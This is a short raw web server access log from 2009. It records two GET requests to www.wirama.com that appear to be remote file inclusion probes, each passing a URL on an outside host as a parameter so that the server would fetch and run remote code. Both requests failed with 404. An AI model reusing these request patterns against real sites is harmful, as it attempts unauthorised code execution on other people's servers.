72.51.35.32 - - [31/Mar/2009:07:45:43 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://release4future.com/images/smilies/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.wirama.com"
207.182.137.218 - - [31/Mar/2009:07:52:47 -0700] "GET /errors.php?error=http://release4future.com/images/smilies/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.wirama.com"
